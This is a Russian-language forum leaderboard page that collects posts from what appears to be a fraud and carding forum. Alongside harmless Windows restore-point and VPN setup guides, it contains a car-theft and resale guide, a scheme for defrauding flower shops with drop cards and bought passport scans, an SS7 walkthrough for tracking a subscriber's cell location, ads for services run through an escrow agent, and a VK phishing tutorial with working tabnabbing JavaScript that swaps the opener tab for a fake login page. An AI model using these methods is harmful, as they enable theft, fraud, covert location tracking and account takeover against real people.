Таблица лидеров
-
в Сообщения
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 11 сентября 2025
-
Год
11 сентября 2024 - 11 сентября 2025
-
Месяц
11 августа 2025 - 11 сентября 2025
-
Неделя
4 сентября 2025 - 11 сентября 2025
-
Сегодня
11 сентября 2025
-
Пользовательская дата
17.08.2022 - 17.08.2022
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 17.08.2022 в Сообщения
-
1 баллПродам полностью рабочую схему, полностью онлайн, Схема непростая, но если грамотно все настроить, можно забыть о работе и поиске заработка минимум на 2-3 года. Схема окупится при первой же выплате!!! Чистый ежемесячный доход со схемы 150-180 тысяч рублей. Схема серая, вероятность залета минимальная. После этого можете регистрировать новый и продолжать зарабатывать дальше. Сам зарабатываю по этой схеме уже больше 2-х лет, продаю так как срочно нужны деньги. Схема непростая, настраивается в течении недели! Продажа: Схема+Настройка+ Тех. Поддержка 24\7 - 60т.р. Поверьте, схема стоит этих денег! Для связи со мной : ЛС stepachka@topsec.in t.me/Stepachkaaa
-
1 балл
-
1 баллПривет, Анон. Сегодня мы поговорим о нашей "любимой" операционной системе Windows 10. Сейчас Microsoft акцентирует внимание именно на ней, прекращая поддержку предыдущих версий и настоятельно рекомендует пользователям переходить на это программное "чудо". Проблема в том, что система достаточно уязвима и имеет очень много проблем и ошибок. Так, последнее обновление Windows 10 выводит из строя компьютеры HP, Dell и другие. Дабы предотвратить такую ситуацию, сегодня я покажу, как создать точку восстановления системы, чтобы после неудачного обновления можно было вернуть прежнюю версию. Это очень важно, так как иногда пользователи не успевают создать точку восстановления и при переустановке удаляются файлы на диске с операционной системой. Да и тратить дополнительное время на такое занятие не совсем хочется. Предупрежден, значит вооружен. Хронология фейлов от компании Microsoft Чтобы лучше разобраться, воспроизведём хронологию "успешных" обновлений. Сначала в начале октября пользователи ОС Windows 10 получили обновления (Windows 10 October 2018 Update), которые безвозвратно удаляли личные файлы (изображения, видео, документы и т.д.) Правда неплохо? Поставил на обновление свой ПК, пока сходил за чаем половину харда просто форматнула система. Теперь проблема с обновлениями KB4464330. Из многочисленных сообщений пользователей понятно, что после обновления появляется синий экран смерти с ошибкой Bsod (код WDF_VIOLATION). В большинстве случаев эта проблема коснулась владельцев гаджетов HP, особенно устройств HP Elitdesk G3 и HP 600 G2. Но по информации сотрудников Microsoft, представители моделей Dell и пр. могут подвергаться аналогичным рискам. На данный момент сборка обновлений KB4464330 приостановлена. Пример ошибки при обновлении Даже несмотря на то, что специалисты работают над поиском проблемы, такие фейлы происходят регулярно. Поэтому, если вы регулярно обновляете свою операционную систему и не хотите увидеть экран смерти — пользуйтесь точками восстановления системы. Они могут помочь не только с некорректными обновлениями, а также если вы неудачно установили сложный софт или система начала работать нестабильно. Как сделать точку восстановления системы в Windows 10? Все этапы детально продублированы на скриншотах. Для начала необходимо перейти в Панель управления -> Восстановление -> Настройка восстановления системы. Или воспользоваться поиском "Создание точки восстановления". Шаг 1 На этом шаге выбираем Создать. Шаг 2 Вводим название для точки восстановления. Удобно добавлять даты или специальные метки, чтоб быстро находить необходимую точку. Шаг 3 После этого начинается процесс создания точки восстановления. В зависимости от количества системных файлов и настроек может изменяться продолжительность. Как правило, занимает 2-10 минут. После успешного создания будет уведомление (Шаг 5). Шаг 4 Шаг 5 Как настроить автоматическое создание точек восстановления? Если вы каждый день работаете с системными файлами, устанавливаете разный софт или просто хотите периодично создавать точки восстановления можно воспользоваться "Планировщиком заданий". Переходим Панель управления -> Администрирование -> Планировщик заданий. Шаг 1 После этого в окне слева нужно выбрать необходимую иерархию папок: Библиотека планировщика заданий -> Microsoft -> Windows -> System Restore. Затем необходимо в центральном окне нажать правой кнопкой мыши на файле SR и выбрать Свойства. Шаг 2 В этом окне открываем вкладку Триггеры и нажимаем Создать. В окне (Шаг 3) можно выбрать необходимые параметры для автоматического создания точек восстановления. Например, можно создавать точки с частотой: однократно, ежедневно, еженедельно, ежемесячно. Можно также выбирать дополнительные параметры. Шаг 3 Как восстановить Windows 10 штатными средствами? Восстановление можно проводить двумя способами. Первый случай предполагает, что даже если вы установили некорректные обновления/софт или что-то другое, у вас есть возможность зайти в систему. Тогда можно воспользоваться штатными инструментами. Для этого выполняем следующие действия: Панель управления -> Восстановление -> Запуск восстановления системы и Далее. Шаг 1 На этом шаге выбираем необходимую точку восстановления и нажимаем Далее. Важно понимать, что восстановления касается только системных и программных настроек ОС. Все остальные программы, которые были установлены после создания точки восстановления будут автоматически удалены. Шаг 2 Далее подтверждаем восстановление и переходим в режим восстановления. После успешного завершения ОС будет работать с конфигурацией последней точки восстановления. Шаг 3 Если вы хотите удалить все точки восстановления для этого нужно вернуться на первый этап пункта (Шаг 1). Выбрать Настройка восстановления системы и выбрать Удалить. Также можно Включить/Выключить защиту системы, а ещё указать доступный размер дискового пространства для точек восстановления. Дополнительный шаг Как восстановить Windows 10 с командной строки? Особенность второго случая, это когда после определенных действий система не загружается, то необходимо восстановить систему посредством Командной строки. После загрузки необходимо выбрать Безопасный режим с поддержкой командной строки. Шаг 1 Далее необходимо в командной строке набрать rstrui.exe после чего откроется стандартное окно Восстановления системы. Выбираем название нашей точки и переходим к восстановлению. После завершения система должна загрузиться в рабочем состоянии. Шаг 2 Как посмотреть файлы и папки с точками восстановления? Все данные находятся в папке System Volume Information, на диске с операционной системы. Но она скрыта и нужно сначала включить, чтобы она отображалась. Для этого переходим Панель управления -> Параметры проводника -> Вид. Убираем галочку "Скрывать защищенные системные файлы" и в конце списка "Показывать скрытые файлы и папки". Шаг 1 После этого на диске появиться папка, но в нее нет возможности зайти (нет прав доступа). Шаг 2 Чтобы решить эту проблему необходимо нажать правой кнопкой мыши на папке, выбрать Свойства -> Безопасность -> Дополнительно. Далее Продолжить и в новом окне выбираем кнопку Добавить. Шаг 3 Вводим имя для нашего объекта, в моем случае Root. И нажимаем OK. Шаг 4 Ставим галочку "Полный доступ", после этого нажимаем продолжить и применить. Теперь можно зайти в папку (Шаг 6) и посмотреть содержимое, а также подгрузить или скопировать точки доступа. Шаг 5 Шаг 6 Заключение В этой статье мы разобрали все особенности создания, хранения, восстановления точек доступа. Это очень полезная штука, которая настраивается за 10 минут и работает постоянно. Поэтому настоятельно рекомендую использовать, если вы не хотите переустанавливать систему после неудачного обновления Windows.
-
1 балл
-
1 баллХВАТИТ СПАМИТЬ ВЕТКУ ДЛЯ ОТЗЫВОВ! ВСЕ ВОПРОСЫ ЗАДАВАЙТЕ МНЕ В ЛС!!!!
-
1 баллНужно переместить статью в халяву бесплатную раздачу , в флэйме ей делать нечего
-
1 баллИщу любую работу без начального капитала. С наркотой не связываюсь. О себе: Адекватный, здравомыслящий, ответственный
-
1 балл
-
1 балл
-
1 балл
-
1 баллЯ рассмотрю такие ОС как Windows, iOS и Android. Начну, пожалуй, с винды. Покажу на примере десятки, она сейчас популярная) Для начала нажимаем Пуск, ищем VPN, находим "Изменение виртуальных частных сетей" Жмём туда и добавляем VPN подключение В качестве адреса сервера указываем айпи нашего впн (был в письме), логин (обычно root, тоже в письме) и пароль (мы его задали при настройке сервера) После этого появляется подключение, щелкаем на него, нажимаем подключиться Если сделали всё правильно, статус должен смениться на "Подключено" Проверяем на сайте https://whoer.net/ сменился ли айпи) Если сменился, то всё сделали правильно. Если нет, то повтори все шаги по новой, что-то упустил. Теперь давай подключимся к нашему VPN с телефона. Начнем с iOS. Открываем "Настройки -> Основные -> VPN"; Дальше выбираем «Добавить конфигурацию VPN»; Появится такое окно. Сюда надо ввести наши данные для подключения. в поле «Описание» вводим название сети в поле «Сервер» пишем айпи в поле «Учетная запись» логин отключаем RSA SecurID; в поле «Пароль» пароль в поле «Общий ключ» ничего не пишем выключаем «Прокси» и нажимаем кнопку «Сохранить». После этого в настройках появится переключатель включения и отключения VPN Включаем и проверяем айпи, должен измениться) Ну и в конце расскажу как подключаться с андроида) Хоть прошивки на андроиде и разные, впн настраивается везде примерно одинаково. Заходим в настройки - подключения - другие настройки – VPN Здесь выбираем добавить VPN, указываем IP своего сервера Жмём сохранить - и он появляется в списке VPN. Далее нажимаем на него, вводим логин/пароль. Их можно сохранить, чтобы не вводить каждый раз вручную. Если всё правильно, то в статус баре появится ключ и мы подключимся к впн) На всякий случай проверяем айпи)
-
1 балл
-
1 баллПолучается у меня нет кризиса ср возроста , я просто идиот ?)
-
1 баллКонцепция проста: в любом городе есть машины которые стоят "без дела". Это те машины что уже давно не имеют действуещего хозяина по разным причинам. Такие машины находятся у вас во дворах и на частных стоянках, а также на штрафстоянке. В системе есть два хода работы: проще и сложнее. Та что по-проще Вы наверное не редко встречали старые машины во дворах. Со спущенными колёсами, накрытые плотной тканью и покрытые толстым слоем пыли. Вот они нам и нужны! Вложения: в пределах 10к Нам нужно будет купить краску, отвёртки, балгарку, арендовать гараж на дропа.( по факту можно просто вскрыть старый гараж и работать там) Безопасность: берите с собой не больше 3 человек. Берить максимально близких знакомых, чтобы не здали. Не трепитесь об этом ни кому. Пользуйтесь услугами дропа. Порядок действий: Найдите машину которая не будет находиться под камерами или в столь освещённом месте. В ночь приедте на машине к машине) и прикрепите на неё трос, по обстоятельствам накачайте колёса. Увезите машину в ближайший гараж и установив на дверь гаража "бумажку"(она нужна для того чтобы проверить, заходил ли в гараж кто-нибудь кроме вас), уйдите домой. Вернитесь через 1-2 дня и если всё хорошо: бумашка на месте, а мусоров по близости нет, то можете приступать. Используя все инструменты нужно разобрать машину. Да-да, разобрать. На кусочки. Открепить дверь, двигатель, кресла, стёкла. Разобрать на запчасти. Лучше дать эту рабу своим "подопечным", а самому ринуться искать покупателя. Обойдите десяток авто салонов и придлагайте им свой товар. Как только машина была разобрана( лучше всего улажиться в сутки, чтобы не вызывать подозрения) и покупатель найден, остаётся только перевести детали в другое место и передать покупателям. То что более целесообразно Вы все знаете что очень много дорогих машин загнивают на штраф стоянках и ни кем не используются. Наша цель это исправить. Вцелом тут уже работать можно несколькими путями. Подкупайте охрану на штрафстоянках и забираете машину. Можете её просто угнать, но так будет много шума и вообще это не безопасно. Отправлять забирать машину стоит дропа, который и подкупить охрану. Ему нужно будет закрасить номера машины и уехать со стоянки. Дабы не палить дропу схроны, лучше всего отправить его по определённому маршруту. К примеру, он остановится у светофора, а твой человек просто возьмёт выпинает дропа из машины, вручить ему его деньги и уедет к гаражу. Такие машины всегда будут в хорошом состоянии и выгоднее всего будет не разбирать её, а демонтажировать: слегка изменить форму корпуса, поменять стёкла, покрасить, заменить колёса, убрать все номера и серийники на машине, отрезать "марки" автомобиля, заменить обивку сидения. Потом найти покупателя на даркнетовских форумах и всё. Вложения 30-70 тысяч рублей - профит в районе 150 тысяч рублей за машину. Это лишь набросок. При умении импровизировать, можно доработать схему до совершенства. Это не простой угон машин. Тут за нами не погонится разъярённый хозяин машины. Хозяина попросту нет или ему по просту плевать.
-
1 баллОткрытая Сеть Телеграм (TON) представляет из себя совокупность следующих элементов: 1) Гибкая платформа мульти-блокчейн; способность обрабатывать миллион транзакций в секунду; умные контракты, обладающие полнотой по Тьюрингу; модифицируемые стандарты, соответствующие протоколу блокчейн; мультикриптовалютные переводы; поддержка каналов для микроплатежей и сети для оплаты вне цепи. Блокчейн TON представляет новые и уникальные характеристики, такие как вертикальный механизм блокчейн, способный к “самоустранению” ошибок и мгновенная гиперкубовая архитектура маршрутизации, что позволит системе быть быстрой, надежной, изменяемой и автономной одновременно. 2) Децентрализованная сеть, применяемая для доступа к блокчейну TON, отправки кандидатов для транзакции и получения обновления только в тех частях цепи, которая необходима пользователю (например, это зависит от аккаунта клиента и умных контрактов), также способна поддерживать произвольные сервисы, которые могут иметь либо не иметь отношения к блокчейн. 3) Технология рассредоточенного хранения файлов доступна в сети TON. Блокчейн Открытой Сети Телеграм использует эту технологию для хранения архивных копий блоков и данных о состоянии (снепшотов). TON также способна хранить независимые файлы для пользователей или сторонних сервисов на платформе, наподобие технологии Торрент. 4)Прокси сети/анонимайзер схож с проектом «Невидимый Интернет». Он используется для того, чтобы скрыть, при необходимости, идентификационный номер компьютера и IP адрес узла сети TON. Например, узлы, совершающие транзакции с аккаунтов с большим количеством криптовалют, или многоуровненые узлы блокчейн с проверкой достоверности, которые стремятся скрыть свой настоящий IP адрес и географическое положение для защиты от DDoS атак. 5)Распределенные хеш-таблицы наподобие Kademlia. Применяются в роли «торрент-трекера» для хранилища TON, как «входной туннельный локализатор» для прокси TON и в качестве сервис-локализатора для сервисов TON. 6)Платформа для независимых сервисов, находящихся и доступных в сети TON и прокси TON, с формализованными интерфейсами, предоставляющими возможность обмена данными в браузерной версии или в приложении для смартфона. Через эти интерфейсы и постоянные сервисы вводятся данные, которые могут быть записаны в блокчейне TON. Подтвержденные узлы, которые поддерживают сервис в любой момент времени, могут быть обнаружены в распределенных хеш-таблицах TON, начиная с информации, записанной в блокчейне TON. Сервисы могут создавать умные контракты в блокчейне TON для предоставления гарантий своим клиентам. 7) Система доменных имен TON. Включает в себя: сервис, присваивающий имена к аккаунтам (в удобной для чтения форме), умные контракты, сервисы и сетевые узлы. 8) Платежи TON. Платформа для микроплатежей, микроплатежные каналы и их сеть. Может быть использована для быстрых переводов средств вне сети блокчейн и для оплаты услуг, управляемых сервисами TON. 9) TON будет способствовать легкой интеграции между отправкой сообщений третьим лицами и сетевыми приложениями. Таким образом, технология блокчейн и распределенные сервисы, наконец, будут доступны обычным пользователям, а не кучке людей, разбирающихся в криптовалютах. Мы предоставим пример такой интеграции в еще одной нашей разработке - мессенджере Телеграм. Тогда, как блокчейн TON является основой проекта TON, а другие составные элементы рассматриваются в качестве второстепенных разработок для блокчейна, они оказываются интересными сами по себе. Используя эти компоненты, мы можем сделать приложения более гибкими, чем, если бы они просто основывались на блокчейне TON.
-
1 баллХотелось бы рассказать вам как все происходила моя сделка со степашкой , во первых я стоял в очереди 3 дня, во вторых я обучался 6 дней, а в третьих мне еще сказали , что в обучение входит курс по СИ , его мы 2 дня изучали, в итоге я потратил 11 дней на все это... Цена тоже не особо маленькая , как никак 60 рублей отдал Но ! мне пошли на уступки и до первого заработка деньги были у гаранта. По итогу хочу сказать следующее : дорого,долго,трудно ( мне так точно) , но! первый клиент принес мне не плохие деньги и я планирую выводить по 150к в месяц, причем самое хорошее что есть в этой схеме, так это полная анонимность и заявление на меня никто не напишет, даже если узнают кто. Следовательно этот отзыв вы можете принимать как положительный. Спасибо всем за внимание , Степ, удачи.
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллОб одной из них — раскрытии местоположения абонента в реальном времени с точностью до определения соты — пойдет речь в данной статье. Я не указываю точность в более привычных единицах измерения, т. к. размер соты не является величиной постоянной. В плотных городских застройках сота может обеспечивать покрытие порядка сотен метров, а в условиях лесов, полей и рек междугородной трассы — нескольких километров. Элементы системы Рисунок 1 Для начала проведу небольшое введение в структуру сотовой сети на примере стандарта GSM. Упрощенная схема стандарта приведена на рисунке 1. Покрытие обеспечивается базовыми станциями (Base Station, BS), каждая из которых, как правило, имеет несколько антенн, направленных в разные стороны. Антенна обеспечивает радиопокрытие соты, каждая сота имеет свой идентификатор (Cell Identity, CI). Базовые станции группируются в географические зоны (Location Area, LA). Группировка происходит чаще всего по территориальному принципу. Идентификатор такой группы называется LAC (Location Area Code). На рисунке 1 каждая базовая станция обеспечивает покрытие трех секторов. Базовые станции подсоединяются к контроллеру базовых станций (Base Station Controller, BSC). В самом простом варианте один LAC соответствует одному BSC. Именно такое назначение LAC показано на примере (рисунок 1). Для наглядности LAC выделены разными цветами. Территория, покрываемая одним LAC, зависит от плотности населения. В Москве, в пределах МКАД, может быть несколько десятков LAC, а в небольшом регионе центральной полосы России разделение на LAC может быть таким: один LAC покрывает областной центр, второй LAC покрывает всю остальную территорию области. Все контроллеры BSC подключаются к коммутатору (Mobile Switching Center, MSC). По сути, MSC представляет собой обычный коммутатор голосовых телефонных вызовов с аппаратно-программным расширением для обеспечения функций мобильности абонентов. В эпоху широкого распространения IP следует напомнить, что MSC оперирует коммутацией цепей (Circuit Switched) согласно установленным в нем статичным таблицам маршрутизации на основе привычной нам телефонной нумерации. Регистр местоположения визитных абонентов (Visited Location Register, VLR) функционально считается отдельным элементом сети, но фактически всегда интегрирована с MSC. В базе данных VLR содержится информация об абонентах, которые в данный момент находятся в зоне действия своего MSC. И раз уж тема статьи о местоположении абонента, то стоит упомянуть, что для каждого абонента в БД VLR хранится информация о текущем идентификаторе LAC, и идентификаторе той соты (CI), которая была при последнем радиоконтакте мобильного телефона с сетью. То есть, если абонент передвигается по территории покрытия одного LAC, не совершая и не принимая вызовов, в базе данных VLR информация о его местоположении не меняется. В общем случае, в сети может быть несколько узлов MSC/VLR. В примере на рисунке 1 показано два таких узла. Еще два функциональных узла — регистр местоположения домашних абонентов (Home Location Register, HLR) и центр аутентификации (Authentication Center, AuC) — размещаются физически в едином модуле. HLR/AuC хранит профили абонентов своей сети. В профиле содержится следующая информация: телефонный номер абонента, уникальный идентификатор SIM-карты (International Mobile Subscriber Identity, IMSI), ключи для обеспечения безопасности, категория абонента (предоплатная система расчетов /постоплатная система расчетов), список разрешенных и запрещенных услуг, адрес биллинг-центра (для абонентов предоплатной системы), адрес MSC/VLR, в зоне действия которого находится абонент в настоящий момент. Этот же профиль с некоторыми изменениями копируется в VLR, когда абонент регистрируется в зоне его действия. Шлюзовой коммутатор (Gateway MSC, GMSC) является приемной точкой для входящих вызовов. Он на основе информации, полученной из HLR, маршрутизирует вызов на тот коммутатор, в зоне действия которого находится вызываемый абонент. В процессе установления вызова, отправки SMS и прочих транзакций, узлы связи обмениваются между собой сигнальными сообщениями. Стек протоколов, набор сообщений и их параметров в сетях телефонной (не только мобильной) связи называется Системой сигнализации №7 (Signaling System 7, SS7). Все протоколы SS7 открыты и доступны для ознакомления и изучения на сайтах таких международных организаций, как МСЭ-Т, 3GPP, GSMA. Описанная далее атака опирается на сообщения SS7. Атака Разумеется, данную атаку не сможет совершить любой человек с улицы. Для осуществления атаки звезды должны расположиться в правильном порядке на небосводе. А именно: Должен быть выход в сеть сигнализации SS7. Есть возможность формировать любые сообщения сигнализации SS7 (для атаки потребуется протокол MAP). В сети жертвы нет средств фильтрации некорректных или подозрительных SS7 сообщений (порядка 90% операторов по всему миру не задумываются о такой фильтрации). Для того чтобы описание атаки не погрязло под скучными определениями и терминами, будем придерживаться следующей легенды. Пара наших сотрудников поехала в командировку в Киев: там у них намечены переговоры с потенциальными клиентами. Судя по времени, коллеги уже должны вернуться с результатом, но они сообщают, что в процессе переговоров возникли сложности, и им придется задержаться. Теперь мы будем пеленговать одного из наших коллег и предлагаем вам отследить весь процесс по стрелочкам на рисунке 2. Рисунок 2 1. Мобильный телефон регистрируются в сети одного из украинских мобильных операторов. В какой-то момент абонент входит в зону покрытия LAC 41800 со стороны сектора CI 22C0 и продолжает движение вплоть до сектора CI 22CF. Что же в это время происходит в сети оператора? Когда телефон оказывается в зоне покрытия LAC 41800, то инициируется процедура Location Update, обновляя в базе данных VLR значения LAC и CI. По мере движения нашего коллеги до сектора CI 22CF в базе данных VLR не происходит более никаких изменений. 2. Мы хотим узнать, на самом ли деле у наших сотрудников идут сложные переговоры. И в какой-то момент мы формируем SMS-сообщение с атрибутом Type-0 и отправляем на номер одного из коллег. Напоминаю, что по легенде он в это время находится в секторе CI 22CF. 3. У SMS-сообщения Type-0 есть другое название — SMS-пинг. Это сообщение не отображается на экране мобильного телефона и не сохраняется в списке принятых SMS. Кроме того, оно осуществляет действия, которые абонент не планировал, а именно, производит обновление атрибутов местоположения в базе данных VLR. Теперь в VLR хранится актуальное значение сектора, в котором прибывает абонент, то есть CI 22CF. 4. Мы уже начали свою активность, однако еще не получили ни байта результата. Информация о местоположении абонента хоть и обновилась, но она находится в недрах оборудования оператора, и чтобы выудить данные, мы продолжаем наши исследования. На следующем шаге формируем сигнальное сообщение sendRoutingInfoForSM, где в качестве параметра указывается мобильный номер нашего сотрудника, и отправляем это сообщение на HLR оператора. 5. В мире телекома принято доверять друг другу, особенно запросам, пришедшим по сетям SS7, и HLR оператора не является исключением из этого правила. На рисунке 3 показана выдержка из трассировки. HLR находит в своих базах данных идентификатор IMSI абонента (1) и адрес MSC/VLR (2), в зоне действия которого находится абонент с заданным номером, и, не подозревая подвоха, сообщает своему «собеседнику» эти данные. Здесь можно обратить внимание на значения некоторых цифр. Первые три цифры идентификатора IMSI обозначают код страны абонента (Mobile Country Code, MCC). Код 250 закреплен за Россией (1). Адрес коммутатора предоставляется в более привычной для нас телефонной нумерации, где 380 — международный телефонный код Украины (2). Рисунок 3 На этом шаге можно сделать небольшую паузу. Дело в том, что в сети существуют сервисы, которые на этом останавливаются и выдают своим пользователям информацию о местоположении любого мобильного абонента с точностью до мобильного коммутатора. Рисунок 4 На рисунке 4 показан фрагмент скриншота с результатами поиска того же самого человека. Тут мы видим номер абонента (1). Кроме того, сервис раскрывает идентификатор IMSI (2), который вообще-то является конфиденциальной информацией и должен храниться оператором за семью печатями. Следом нам показан номер сервис-центра, где находится абонент (3). Фактически это урезанный адрес мобильного коммутатора. В России по номеру сервис-центра можно определить регион нахождения абонента, т. к. адресация коммутаторов совпадает с региональной телефонной нумерацией. К сожалению, для украинских мобильных операторов мне не удалось найти такого соответствия. 6. Наши поиски продолжаются. Теперь мы формируем сообщение provideSubscriberInfo, где в качестве параметра задаем идентификатор IMSI, и отправляем это сообщение на адрес мобильного коммутатора. Все нужные параметры (IMSI и адрес MSC/VLR) мы получили на предыдущем шаге. 7. И опять мы сыграем на всеобщем доверии. Коммутатор воспринимает сообщение как вполне легальное и с удовольствием сообщает в ответ идентификаторы сети MCC/MNC, значение LAC и недавно обновленное значение сектора CI. Теперь посмотрим на трассировку (рисунок 5). Все значения, нужные нам для пеленгации, получены: MCC — код страны; MNC (Mobile Network Code) — код мобильного оператора; LAC (для дальнейшего использования нужно привести это значение в шестнадцатеричный вид: 41800 = A348h); CGI (Cell Global Identity) — код соты, значение сразу показано в шестнадцатеричном виде. Рисунок 5 Пока это только набор цифр, из которого мы сможем узнать страну по MCC — код 255 закреплен за Украиной. Пока все сходится. Для финального выстрела открываем сервис для определения координат базовой станции, коих в сети можно найти немало (рисунок 6). И что же мы видим? Это не Киев, а Феодосия, причем сектор обслуживает не городскую черту, а морское побережье с пляжами! Теперь ясно, чем наши коллеги так долго заняты в командировке Рисунок 6 Заключение В качестве пользователей описанного в статье «сервиса» можно представить криминальных элементов, промышленных шпионов, частных детективов… Но остается вопрос: кто и каким образом может реализовать подобного рода атаки? В первую очередь, такая возможность есть у технических специалистов операторов связи, причем сам оператор может находиться в любой стране мира. Во-вторых, для реализации сервиса может быть специально создана компания с получением необходимых лицензий, закупкой оборудования и подключением к SS7 обязательно с возможностью работы протокола MAP. Денежные затраты на реализацию такого варианта в России будут исчисляться круглыми суммами и вряд ли смогут окупиться. Третий вариант — взлом сети управления оператора и внедрение «жучка» в его существующую инфраструктуру. А у правоохранительных органов имеются свои средства оперативно-розыскных мероприятий (СОРМ), в том числе с функцией поиска местоположения.
-
1 балл
-
1 баллЧеловек за которым гонялось ФСБ и при этом он умудрялся участвовать в прямых эфирах на тв. Мой кумир
-
1 баллПо официальной информации 28.08.2017 группа компаний СДЭК потеряла более 2000 посылок доставляемых авиапутем В ходе разберательств было выяленно , что посылки не вернут адресатам , если вы не дождались своей заветной посылки , то за юридической помощью можно обратиться в арбитражные суды
-
1 баллСлишком бонально , об этом все знают , если клей на банкомате , то он полюбому битый
-
1 балл
-
1 балл
-
1 баллАктуально ! Работаем , обращайтесь в лс Всегда в наличие очень много материала , разные банки, виды деятельности , года!!
-
1 баллСегодня наш разговор пойдет о разводе организаций на полную оплату. Работать мы будем в онлайне так же на телефоне. Ни каких личных встреч! Для работы нам понадобиться карта оформленная желательно на дропа, ну если в жизни не хватает адреналина то конечно можно воспользоваться своей. Сим карта желательно с городским номером, благо сейчас любой оператор предоставляет эту услугу за 3р в день, её тоже бы не помешало оформить на дропа. Несколько аккаунтов в ВК. ну и конечно выход в интернет с небольшими знаниями безопасности (лично я использовал банальный впн на несколько баксов в месяц), но, например, ВК на сколько мне известно IP своих пользователей не выдает но на всякий случай лучше перестраховаться. Ну и еще не помешают элементарные знания СИ или просто более менее подвешенный язык. В идеале еще соорудить простейший лендинг и сослаться на него в группе. Скажу что по этой теме можно сорвать большой куш 2 раза в год. А точнее 8 марта и 1 сентября. И как конечно же Вы уже догадались торговать мы будем цветами. Ну, а ежемесячно поднимать хорошую цифру которую мужик на заводе не заработает очень долго. Схема требует подготовки, хотя бы в том что аккаунты должны быть не свежереги а самое главное Фамилия и Имя должны совпадать с заранее купленным сканом паспорта(зачем будет изложено ниже, но в идеале конечно будет купить сканы полного комплекта юридического лица и паспорта владельца), иначе получится очень странно когда товар предлагают ребята которые в ВК зарегистрированы менее недели. Далее необходимо создать группу и создать видимость работы в ней, отзывы фото и т. д. не стоит выкладывать все одним днем и в одночасье. В альбомах у нас будут теплицы с цветами, самые распространенные это естественно розы и тюльпаны вот именно их мы и будем продавать оптом. Лучше всего делать раздельные группы с разными цветами, потому как разведение одной компанией 2 видов цветов это тяжело с точки зрения производства. Итак создали аккаунты, накидали группу о выращивании цветов в любом городе который вам нравится, и представляемся продажником фирмы которая производит цветы, если возникнут вопросы то можно сказать что у вас агентский договор с поставщиком. Что же нам нужно делать далее?! Все элементарно и просто мы ищем группы магазинов цветов которые находятся НЕ в ближайших регионах от того что вы указали в своей группе. Лучше всего использовать расстояние 900-1200 км. Пишем сообщения администраторам групп (90% из них и является владельцами салонов) о том, что ваша компания занимается продажей цветов и рады предложить Вам отличный цветок (именно так продавцы называют свой товар не цветы а цветок) по очень хорошей приемлемой цене. Примерный диапазон цен на данный момент вот такой: на тюльпаны от 100-35р от 500-32р от 1000-31р от 5000-30р от 10000-29р. Цена на розу зависит от ее высоты. и очень редко от сорта, 40 см - 33 руб, 50 см - 37 руб, 60 см - 41 руб, 70 см - 46 руб, цвета на выбор, это пример из объявления, можно сделать цену чуть чуть ниже. Но можно скинуть несколько рублей для того что бы клиент вами заинтересовался но не стоит этим злоупотреблять потому как могут почуять неладное. Надо знать название сортов тюльпанов и роз. Еще один немаловажный факт заключается в том что цветок срезают в определенный срок, который устанавливаем мы сами. Например 20 мая (дата очень хорошая потому как на носу последний звонок). Тем самым мы можем создать искусственный дефицит на свой товар. И так, когда жертва заинтересовалась в нашем товаре мы предлагаем купить как можно больше по более интересной цене и так же предлагаем разделить транспортные расходы пополам (тут будет фактор человеческой жадности), например, так как у вас отказался клиент от очень крупной партии, а срез цветов будет уже скоро. Заранее еще надо обсудить момент доставки, желательно по телефону так как это опять же внушает доверие. Вообще не бойтесь общаться по телефону это нормально, очень многие люди бояться говорить по телефону. По голосу Вас ни кто не узнает. Позвоните в компанию грузоперевозок и узнайте сколько будет стоить доставка груза в рефрижераторе с температурой +4 градуса и сообщаем цену нашему клиенту скинув при этом тысячи 3-4 сказав что у нас договор с этим перевозчиком или же что это попутный груз. Еще надо указать что свою часть денег за доставку он отдаст водителю при выгрузке, а свою часть мы отдадим при погрузке. Далее мы составляем договора, в которых указываем данные паспорта или юридического лица которые Вы купили заранее. Там все просто, надо несколько раз прочесть его и все станет понятно. А так же скидываете все данные жертве для того что бы еще больше войти в доверие. Все сканы с которых мы пишем данные в договор. После такого аттракциона невиданной щедрости жертва будет уверена что никакой опасности в данной сделке нет и переводит деньги Вам на счет. Хранить деньги на карте дропа вообще никогда не стоит, как только вам говорят о переводе хватайте ноги в руки и бегите в банкомат. Далее наступает день Х и вы сами звоните клиенту и говорите что все в порядке, цветы срезали и готовят к отправке и машина придет на погрузку ближе к вечеру. После чего выкидываете сим-карту и удаляете себя из социальных сетей и через некоторое время повторяете этот круг заново но уже с новой фирмой и новым номером телефона. Если клиентов много то рекомендую вести записи в блокноте что бы не забыть с кем какие договоренности были. По поводу моральной стороны вопроса, что мы кидаем магазины прибыль которых составляет примерно от 5000 в плохой день. А пробные партии предлагайте на 100 тысяч, так что дети голодать не будут не переживайте. И самое главное что всегда нужно уметь импровизировать и додумывать ситуацию и направлять жертву в нужное для нас направление.
-
1 балл2 дня назад увидел пару человек , которые предоставляют услуги по взлому аккаунтов в социальной сети ВКонтакте. Я решил провести тест , и не пожалев денег заказал услугу по взлому собственной страницы. Человек добавил меня , и скинул ссылку якобы на мою фотографию (домен был не бесплатный) , я перешёл и увидел что родительская вкладка была заменена на фейковую , и после чего мне выдало окно авторизации ВКонтакте. Здесь все становиться ясно , и ниже я если можно так сказать "солью" способ взлома. ------------------------------------------------------------------------------------ 1. Регистрируем любой хостинг аккаунт (можно и с бесплатным доменом). 2. Далее закидаем фейковую страницу в корень , и после чего создаем файл window.htm (можете использовать любое название). 3. Открываем наш только созданный файл через редактор , и пишем следующий код: <html> <head> <title></title> </head> <body> <script language="JavaScript"> if(parent.window.opener) parent.window.opener.location.replace("http://fent.in"); // Ссылка на фейк. document.location.href = "http://fent.in"; // Ссылка для отводки глаз жертвы. </script> </body> </html> Готово ! По данному принципу работает множество "взломщиков". Пользуемся
-
1 балл
-
